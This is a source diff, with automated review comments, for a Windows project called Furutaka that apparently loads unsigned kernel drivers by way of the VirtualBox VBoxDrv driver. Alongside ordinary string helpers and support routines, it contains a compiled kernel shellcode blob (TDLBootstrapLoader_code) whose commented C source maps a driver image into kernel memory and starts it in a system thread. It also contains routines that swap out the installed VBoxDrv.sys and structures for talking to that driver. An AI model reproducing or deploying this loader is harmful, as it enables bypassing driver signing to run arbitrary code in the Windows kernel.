#define _strcmpi _strcmpi_a
#define _strncmpi _strncmpi_a
#define _strstr _strstr_a
#define _strstri _strstri_a
#define ultostr ultostr_a
#define ultohex ultohex_a
#define itostr itostr_a
#define i64tostr i64tostr_a
#define u64tostr u64tostr_a
#define u64tohex u64tohex_a
#define strtoul strtoul_a
#define hextoul hextoul_a
#define strtoi strtoi_a
#define strtoi64 strtoi64_a
#define strtou64 strtou64_a
#define hextou64 hextou64_a
#endif
#endif /* _MINIRTL_ */
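Review bot: The ANSI branch defines `_strcmp` twice on consecutive lines (`#define _strcmp _strcmp_a` appears twice); it is a harmless identical redefinition, but it reads like a copy-paste slip and should be reduced to one line. Mapping the CRT names `strtoul` and `strtoi64`-style identifiers to these routines via macros will silently rewrite any later `strtoul(...)` call in a translation unit that also includes `<stdlib.h>`, so either rename the macros (e.g. `_strtoul`) or document that this header must not be mixed with the CRT. The string-to-integer prototypes (`strtoul_a` through `hextou64_w`) take non-const `char *`/`wchar_t *` although they presumably only read the input; `const` parameters would let callers pass literals and make the intent explicit.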


@ -0,0 +1,43 @@
#ifndef _WCHAR_T_DEFINED
typedef unsigned short wchar_t;
#define _WCHAR_T_DEFINED
#endif /* _WCHAR_T_DEFINED */
#ifndef _SIZE_T_DEFINED
#ifdef _WIN64
typedef unsigned __int64 size_t;
#else /* _WIN64 */
typedef __w64 unsigned int size_t;
#endif /* _WIN64 */
#define _SIZE_T_DEFINED
#endif /* _SIZE_T_DEFINED */
__forceinline char locase_a(char c)
{
if ((c >= 'A') && (c <= 'Z'))
return c + 0x20;
else
return c;
}
__forceinline wchar_t locase_w(wchar_t c)
{
if ((c >= 'A') && (c <= 'Z'))
return c + 0x20;
else
return c;
}
__forceinline char byteabs(char x) {
if (x < 0)
return -x;
return x;
}
__forceinline int _isdigit_a(char x) {
return ((x >= '0') && (x <= '9'));
}
__forceinline int _isdigit_w(wchar_t x) {
return ((x >= L'0') && (x <= L'9'));
}
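Review bot: byteabs negates a `char` and returns `char`, so for x == -128 (CHAR_MIN with MSVC's signed char) the value 128 does not fit and the conversion back to char is implementation-defined, in practice returning -128, i.e. a negative "absolute value"; either widen the return type to int or add a comment `/* note: byteabs(CHAR_MIN) overflows and stays negative */` if that input is known never to occur. locase_a/locase_w fold only ASCII A–Z, which is fine for the service and object names this loader compares but deserves a `/* ASCII-only case fold */` comment so the helpers are not reused on localized text.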


@ -0,0 +1,49 @@
#include "rtltypes.h"
size_t u64tohex_a(unsigned long long x, char *s)
{
char p;
size_t c;
if (s==0)
return 16;
for (c=0; c<16; c++) {
p = (char)(x & 0xf);
x >>= 4;
if (p<10)
p += '0';
else
p = 'A' + (p-10);
s[15-c] = p;
}
s[16] = 0;
return 16;
}
size_t u64tohex_w(unsigned long long x, wchar_t *s)
{
wchar_t p;
size_t c;
if (s==0)
return 16;
for (c = 0; c<16; c++) {
p = (wchar_t)(x & 0xf);
x >>= 4;
if (p<10)
p += L'0';
else
p = L'A' + (p-10);
s[15-c] = p;
}
s[16] = 0;
return 16;
}
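Review bot: u64tohex_a and u64tohex_w carry no comment stating the buffer contract: they store 16 hex digits plus a terminator (17 elements), while the return value, and the length probe taken when s is NULL, is 16, so a caller that sizes its buffer from the returned length overflows by one element. A header comment such as `/* s must hold at least 17 elements; writes 16 upper-case hex digits and a NUL, returns 16 (pass s == NULL to query the length) */` settles this. The same omission applies to ultohex_a/_w (9 elements written for a return of 8) and to u64tostr_a/_w and ultostr_a/_w, which return the digit count r but write r + 1 elements.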


@ -0,0 +1,45 @@
#include "rtltypes.h"
size_t u64tostr_a(unsigned long long x, char *s)
{
unsigned long long t = x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (char)(x % 10) + '0';
x /= 10;
}
s[r] = (char)0;
return r;
}
size_t u64tostr_w(unsigned long long x, wchar_t *s)
{
unsigned long long t = x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (wchar_t)(x % 10) + L'0';
x /= 10;
}
s[r] = (wchar_t)0;
return r;
}


@ -0,0 +1,49 @@
#include "rtltypes.h"
size_t ultohex_a(unsigned long x, char *s)
{
char p;
size_t c;
if (s==0)
return 8;
for (c=0; c<8; c++) {
p = (char)(x & 0xf);
x >>= 4;
if (p<10)
p += '0';
else
p = 'A' + (p-10);
s[7-c] = p;
}
s[8] = 0;
return 8;
}
size_t ultohex_w(unsigned long x, wchar_t *s)
{
wchar_t p;
size_t c;
if (s==0)
return 8;
for (c=0; c<8; c++) {
p = (wchar_t)(x & 0xf);
x >>= 4;
if (p<10)
p += L'0';
else
p = L'A' + (p-10);
s[7-c] = p;
}
s[8] = 0;
return 8;
}


@ -0,0 +1,45 @@
#include "rtltypes.h"
size_t ultostr_a(unsigned long x, char *s)
{
unsigned long t=x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (char)(x % 10) + '0';
x /= 10;
}
s[r] = (char)0;
return r;
}
size_t ultostr_w(unsigned long x, wchar_t *s)
{
unsigned long t=x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (wchar_t)(x % 10) + L'0';
x /= 10;
}
s[r] = (wchar_t)0;
return r;
}

4904
Source/Furutaka/ntos.h Normal file

File diff suppressed because it is too large Load Diff

BIN
Source/Furutaka/resource.h Normal file

Binary file not shown.

BIN
Source/Furutaka/resource.rc Normal file

Binary file not shown.

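--- a/Source/Furutaka/shellcode.h
+++ b/Source/Furutaka/shellcode.h
@@ -0,0 +1,145 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: SHELLCODE.H
+*
+* VERSION: 1.00
+*
+* DATE: 30 Jan 2016
+*
+* Loader bootstrap shellcode.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
+_In_ POOL_TYPE PoolType,
+_In_ SIZE_T NumberOfBytes,
+_In_ ULONG Tag
+);
+typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
+_Out_ PHANDLE ThreadHandle,
+_In_ ULONG DesiredAccess,
+_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+_In_opt_ HANDLE ProcessHandle,
+_Out_opt_ PCLIENT_ID ClientId,
+_In_ PKSTART_ROUTINE StartRoutine,
+_In_opt_ PVOID StartContext
+);
+/*
+* TDLBootstrapLoader
+*
+* Purpose:
+*
+* Main part of shellcode used to execute driver code.
+*
+*/
+/*
+void TDLBootstrapLoader(
+PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
+PfnPsCreateSystemThread PsCreateSystemThread)
+{
+ULONG_PTR pos, exbuffer,
+Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
+PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
+PIMAGE_FILE_HEADER fileh =
+(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
+PIMAGE_OPTIONAL_HEADER popth =
+(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
+ULONG isz = popth->SizeOfImage;
+HANDLE th;
+PIMAGE_BASE_RELOCATION rel;
+DWORD_PTR delta;
+LPWORD chains;
+DWORD c, p, rsz;
+OBJECT_ATTRIBUTES attr;
+exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
+NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
+exbuffer &= ~(PAGE_SIZE - 1);
+if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
+if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
+{
+rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
+popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
+rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
+delta = (DWORD_PTR)exbuffer - popth->ImageBase;
+c = 0;
+while (c < rsz) {
+p = sizeof(IMAGE_BASE_RELOCATION);
+chains = (LPWORD)((PBYTE)rel + p);
+while (p < rel->SizeOfBlock) {
+switch (*chains >> 12) {
+case IMAGE_REL_BASED_HIGHLOW:
+*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
+break;
+case IMAGE_REL_BASED_DIR64:
+*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
+break;
+}
+chains++;
+p += sizeof(WORD);
+}
+c += rel->SizeOfBlock;
+rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
+}
+}
+isz >>= 3;
+for (pos = 0; pos < isz; pos++)
+((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
+InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
+PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
+(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
+}
+*/
+static const unsigned char TDLBootstrapLoader_code[415] = {
+0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
+0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
+0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
+0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
+0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
+0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
+0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
+0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
+0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
+0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
+0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
+0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
+0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
+0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
+0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
+0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
+0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
+0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
+0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
+0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
+0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
+0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
+0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
+0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
+0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
+0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
+};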
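Review bot: TDLBootstrapLoader_code cannot be audited against the commented-out C reference above it, because nothing records how the 415 bytes were produced; a comment naming the compiler version, optimization settings and the extraction procedure (or a build step that regenerates the array from the reference) would let a reviewer confirm the blob still corresponds to the source. The reference also hard-codes a layout contract, `Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;`, meaning the image is expected exactly 0x200 bytes past the start of the shellcode; that offset belongs in a named define shared with whatever code lays out the buffer, and in the header comment, since the compiled blob silently breaks if the other side changes it.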

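--- a/Source/Furutaka/sup.c
+++ b/Source/Furutaka/sup.c
@@ -0,0 +1,422 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: SUP.C
+*
+* VERSION: 1.00
+*
+* DATE: 01 Feb 2016
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+/*
+* supGetSystemInfo
+*
+* Purpose:
+*
+* Wrapper for NtQuerySystemInformation.
+*
+*/
+PVOID supGetSystemInfo(
+_In_ SYSTEM_INFORMATION_CLASS InfoClass
+)
+{
+INT c = 0;
+PVOID Buffer = NULL;
+ULONG Size = 0x1000;
+NTSTATUS status;
+ULONG memIO;
+PVOID hHeap = NtCurrentPeb()->ProcessHeap;
+do {
+Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
+if (Buffer != NULL) {
+status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
+}
+else {
+return NULL;
+}
+if (status == STATUS_INFO_LENGTH_MISMATCH) {
+RtlFreeHeap(hHeap, 0, Buffer);
+Size *= 2;
+c++;
+if (c > 100) {
+status = STATUS_SECRET_TOO_LONG;
+break;
+}
+}
+} while (status == STATUS_INFO_LENGTH_MISMATCH);
+if (NT_SUCCESS(status)) {
+return Buffer;
+}
+if (Buffer) {
+RtlFreeHeap(hHeap, 0, Buffer);
+}
+return NULL;
+}
+/*
+* supGetNtOsBase
+*
+* Purpose:
+*
+* Return ntoskrnl base address.
+*
+*/
+ULONG_PTR supGetNtOsBase(
+VOID
+)
+{
+PRTL_PROCESS_MODULES miSpace;
+ULONG_PTR NtOsBase = 0;
+miSpace = supGetSystemInfo(SystemModuleInformation);
+while (miSpace != NULL) {
+NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
+RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
+break;
+}
+return NtOsBase;
+}
+/*
+* supQueryResourceData
+*
+* Purpose:
+*
+* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
+*
+*/
+PBYTE supQueryResourceData(
+_In_ ULONG_PTR ResourceId,
+_In_ PVOID DllHandle,
+_In_ PULONG DataSize
+)
+{
+NTSTATUS status;
+ULONG_PTR IdPath[3];
+IMAGE_RESOURCE_DATA_ENTRY *DataEntry;
+PBYTE Data = NULL;
+ULONG SizeOfData = 0;
+if (DllHandle != NULL) {
+IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
+IdPath[1] = ResourceId; //id
+IdPath[2] = 0; //lang
+status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
+if (NT_SUCCESS(status)) {
+status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
+if (NT_SUCCESS(status)) {
+if (DataSize) {
+*DataSize = SizeOfData;
+}
+}
+}
+}
+return Data;
+}
+/*
+* supBackupVBoxDrv
+*
+* Purpose:
+*
+* Backup virtualbox driver file if it already installed.
+*
+*/
+BOOL supBackupVBoxDrv(
+_In_ BOOL bRestore
+)
+{
+BOOL bResult = FALSE;
+WCHAR szOldDriverName[MAX_PATH * 2];
+WCHAR szNewDriverName[MAX_PATH * 2];
+WCHAR szDriverDirName[MAX_PATH * 2];
+if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) {
+return FALSE;
+}
+_strcat(szDriverDirName, TEXT("\\drivers\\"));
+if (bRestore) {
+_strcpy(szOldDriverName, szDriverDirName);
+_strcat(szOldDriverName, TEXT("VBoxDrv.backup"));
+if (PathFileExists(szOldDriverName)) {
+_strcpy(szNewDriverName, szDriverDirName);
+_strcat(szNewDriverName, TEXT("VBoxDrv.sys"));
+bResult = MoveFileEx(szOldDriverName, szNewDriverName,
+MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
+}
+}
+else {
+_strcpy(szOldDriverName, szDriverDirName);
+_strcat(szOldDriverName, TEXT("VBoxDrv.sys"));
+_strcpy(szNewDriverName, szDriverDirName);
+_strcat(szNewDriverName, TEXT("VBoxDrv.backup"));
+bResult = MoveFileEx(szOldDriverName, szNewDriverName,
+MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
+}
+return bResult;
+}
+/*
+* supWriteBufferToFile
+*
+* Purpose:
+*
+* Create new file (or open existing) and write (append) buffer to it.
+*
+*/
+SIZE_T supWriteBufferToFile(
+_In_ PWSTR lpFileName,
+_In_ PVOID Buffer,
+_In_ SIZE_T Size,
+_In_ BOOL Flush,
+_In_ BOOL Append
+)
+{
+NTSTATUS Status;
+DWORD dwFlag;
+HANDLE hFile = NULL;
+OBJECT_ATTRIBUTES attr;
+UNICODE_STRING NtFileName;
+IO_STATUS_BLOCK IoStatus;
+LARGE_INTEGER Position;
+ACCESS_MASK DesiredAccess;
+PLARGE_INTEGER pPosition = NULL;
+ULONG_PTR nBlocks, BlockIndex;
+ULONG BlockSize, RemainingSize;
+PBYTE ptr = (PBYTE)Buffer;
+SIZE_T BytesWritten = 0;
+if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)
+return 0;
+DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
+dwFlag = FILE_OVERWRITE_IF;
+if (Append == TRUE) {
+DesiredAccess |= FILE_READ_ACCESS;
+dwFlag = FILE_OPEN_IF;
+}
+InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
+__try {
+Status = NtCreateFile(&hFile, DesiredAccess, &attr,
+&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
+FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
+if (!NT_SUCCESS(Status))
+__leave;
+pPosition = NULL;
+if (Append == TRUE) {
+Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
+Position.HighPart = -1;
+pPosition = &Position;
+}
+if (Size < 0x80000000) {
+BlockSize = (ULONG)Size;
+Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
+if (!NT_SUCCESS(Status))
+__leave;
+BytesWritten += IoStatus.Information;
+}
+else {
+BlockSize = 0x7FFFFFFF;
+nBlocks = (Size / BlockSize);
+for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
+Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
+if (!NT_SUCCESS(Status))
+__leave;
+ptr += BlockSize;
+BytesWritten += IoStatus.Information;
+}
+RemainingSize = Size % BlockSize;
+if (RemainingSize != 0) {
+Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
+if (!NT_SUCCESS(Status))
+__leave;
+BytesWritten += IoStatus.Information;
+}
+}
+}
+__finally {
+if (hFile != NULL) {
+if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus);
+NtClose(hFile);
+}
+RtlFreeUnicodeString(&NtFileName);
+}
+return BytesWritten;
+}
+/*
+* supDetectObjectCallback
+*
+* Purpose:
+*
+* Comparer callback routine used in objects enumeration.
+*
+*/
+NTSTATUS NTAPI supDetectObjectCallback(
+_In_ POBJECT_DIRECTORY_INFORMATION Entry,
+_In_ PVOID CallbackParam
+)
+{
+POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
+if (Entry == NULL) {
+return STATUS_INVALID_PARAMETER_1;
+}
+if (CallbackParam == NULL) {
+return STATUS_INVALID_PARAMETER_2;
+}
+if (Param->Buffer == NULL || Param->BufferSize == 0) {
+return STATUS_MEMORY_NOT_ALLOCATED;
+}
+if (Entry->Name.Buffer) {
+if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
+return STATUS_SUCCESS;
+}
+}
+return STATUS_UNSUCCESSFUL;
+}
+/*
+* supEnumSystemObjects
+*
+* Purpose:
+*
+* Lookup object by name in given directory.
+*
+*/
+NTSTATUS NTAPI supEnumSystemObjects(
+_In_opt_ LPWSTR pwszRootDirectory,
+_In_opt_ HANDLE hRootDirectory,
+_In_ PENUMOBJECTSCALLBACK CallbackProc,
+_In_opt_ PVOID CallbackParam
+)
+{
+BOOL cond = TRUE;
+ULONG ctx, rlen;
+HANDLE hDirectory = NULL;
+NTSTATUS status;
+NTSTATUS CallbackStatus;
+OBJECT_ATTRIBUTES attr;
+UNICODE_STRING sname;
+POBJECT_DIRECTORY_INFORMATION objinf;
+if (CallbackProc == NULL) {
+return STATUS_INVALID_PARAMETER_4;
+}
+status = STATUS_UNSUCCESSFUL;
+__try {
+// We can use root directory.
+if (pwszRootDirectory != NULL) {
+RtlSecureZeroMemory(&sname, sizeof(sname));
+RtlInitUnicodeString(&sname, pwszRootDirectory);
+InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
+status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
+if (!NT_SUCCESS(status)) {
+return status;
+}
+}
+else {
+if (hRootDirectory == NULL) {
+return STATUS_INVALID_PARAMETER_2;
+}
+hDirectory = hRootDirectory;
+}
+// Enumerate objects in directory.
+ctx = 0;
+do {
+rlen = 0;
+status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
+if (status != STATUS_BUFFER_TOO_SMALL)
+break;
+objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
+if (objinf == NULL)
+break;
+status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
+if (!NT_SUCCESS(status)) {
+RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+break;
+}
+CallbackStatus = CallbackProc(objinf, CallbackParam);
+RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+if (NT_SUCCESS(CallbackStatus)) {
+status = STATUS_SUCCESS;
+break;
+}
+} while (cond);
+if (hDirectory != NULL) {
+NtClose(hDirectory);
+}
+}
+__except (EXCEPTION_EXECUTE_HANDLER) {
+status = STATUS_ACCESS_VIOLATION;
+}
+return status;
+}
+/*
+* supIsObjectExists
+*
+* Purpose:
+*
+* Return TRUE if the given object exists, FALSE otherwise.
+*
+*/
+BOOL supIsObjectExists(
+_In_ LPWSTR RootDirectory,
+_In_ LPWSTR ObjectName
+)
+{
+OBJSCANPARAM Param;
+if (ObjectName == NULL) {
+return FALSE;
+}
+Param.Buffer = ObjectName;
+Param.BufferSize = (ULONG)_strlen(ObjectName);
+return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
+}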
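Review bot: supBackupVBoxDrv's backup branch renames VBoxDrv.sys over an existing VBoxDrv.backup with MOVEFILE_REPLACE_EXISTING, so a second run after an interrupted first one replaces the user's genuine driver backup with whatever is currently installed, and the later restore then puts the wrong file back. Checking the destination first preserves it: `if (PathFileExists(szNewDriverName)) return FALSE; /* backup already present, keep it */` ahead of the MoveFileEx in the non-restore path, or treat an existing backup as success if the caller should proceed. A smaller point in supDetectObjectCallback: Param->BufferSize is validated but never used in the comparison, and Entry->Name is a UNICODE_STRING whose Buffer is not guaranteed to be NUL-terminated, so comparing by length, `Entry->Name.Length == Param->BufferSize * sizeof(WCHAR) && _strncmpi_w(Entry->Name.Buffer, Param->Buffer, Param->BufferSize) == 0`, is safer than _strcmpi_w on it.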

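--- a/Source/Furutaka/sup.h
+++ b/Source/Furutaka/sup.h
@@ -0,0 +1,59 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: SUP.H
+*
+* VERSION: 1.00
+*
+* DATE: 01 Feb 2016
+*
+* Common header file for the program support routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
+typedef struct _OBJSCANPARAM {
+PWSTR Buffer;
+ULONG BufferSize;
+} OBJSCANPARAM, *POBJSCANPARAM;
+ULONG_PTR supGetNtOsBase(
+VOID
+);
+PVOID supGetSystemInfo(
+_In_ SYSTEM_INFORMATION_CLASS InfoClass
+);
+PBYTE supQueryResourceData(
+_In_ ULONG_PTR ResourceId,
+_In_ PVOID DllHandle,
+_In_ PULONG DataSize
+);
+BOOL supBackupVBoxDrv(
+_In_ BOOL bRestore
+);
+SIZE_T supWriteBufferToFile(
+_In_ PWSTR lpFileName,
+_In_ PVOID Buffer,
+_In_ SIZE_T Size,
+_In_ BOOL Flush,
+_In_ BOOL Append
+);
+BOOL supIsObjectExists(
+_In_ LPWSTR RootDirectory,
+_In_ LPWSTR ObjectName
+);
+#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)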
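Review bot: `_In_ PULONG DataSize` on supQueryResourceData is annotated as an input, but the definition in sup.c writes through it (`*DataSize = SizeOfData;`) and tolerates NULL, so the declaration should read `_Out_opt_ PULONG DataSize` here and in sup.c for SAL to catch misuse. OBJSCANPARAM.BufferSize also lacks its unit; supIsObjectExists fills it with _strlen, so a comment such as `ULONG BufferSize; // length of Buffer in WCHARs, without the terminator` would prevent a byte/character mix-up. The PathFileExists macro compares against `(DWORD)-1`; `INVALID_FILE_ATTRIBUTES` is the named constant, and callers should be aware that any GetFileAttributes failure (for example access denied) is reported as "does not exist".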

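--- a/Source/Furutaka/vbox.h
+++ b/Source/Furutaka/vbox.h
@@ -0,0 +1,226 @@
+#include <stdint.h>
+typedef void* RTR0PTR;
+typedef struct _SUPREQHDR {
+/** Cookie. */
+uint32_t u32Cookie;
+/** Session cookie. */
+uint32_t u32SessionCookie;
+/** The size of the input. */
+uint32_t cbIn;
+/** The size of the output. */
+uint32_t cbOut;
+/** Flags. See SUPREQHDR_FLAGS_* for details and values. */
+uint32_t fFlags;
+/** The VBox status code of the operation, out direction only. */
+int32_t rc;
+} SUPREQHDR;
+/** SUP_IOCTL_COOKIE. */
+typedef struct _SUPCOOKIE {
+/** The header.
+* u32Cookie must be set to SUPCOOKIE_INITIAL_COOKIE.
+* u32SessionCookie should be set to some random value. */
+SUPREQHDR Hdr;
+union
+{
+struct
+{
+/** Magic word. */
+char szMagic[16];
+/** The requested interface version number. */
+uint32_t u32ReqVersion;
+/** The minimum interface version number. */
+uint32_t u32MinVersion;
+} In;
+struct
+{
+/** Cookie. */
+uint32_t u32Cookie;
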